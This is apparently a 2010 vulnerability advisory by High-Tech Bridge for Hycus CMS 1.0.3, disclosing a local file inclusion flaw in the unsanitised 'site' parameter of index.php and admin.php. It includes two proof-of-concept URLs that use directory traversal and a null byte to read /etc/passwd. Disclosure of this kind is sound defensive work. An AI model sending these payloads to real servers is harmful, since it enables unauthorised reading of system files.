Hycus CMS 1.0.3 Local File Inclusion

`Vulnerability ID: HTB22737  
Reference: http://www.htbridge.ch/advisory/lfi_in_hycus_cms.html  
Product: Hycus CMS  
Vendor: Hycus Web Development Team ( http://www.hycus.com/ )   
Vulnerable Version: 1.0.3  
Vendor Notification: 07 December 2010   
Vulnerability Type: LFI  
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response  
Risk level: High   
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)   
  
Vulnerability Details:  
The vulnerability exists due to failure in the "/index.php" and "admin.php" scripts to properly sanitize user-supplied input in "site" variable.  
  
The following PoC is available:  
  
  
http://[host]/index.php?site=../../../../../../../etc/passwd%00  
http://[host]/admin.php?site=../../../../../../../etc/passwd%00  
  
  
`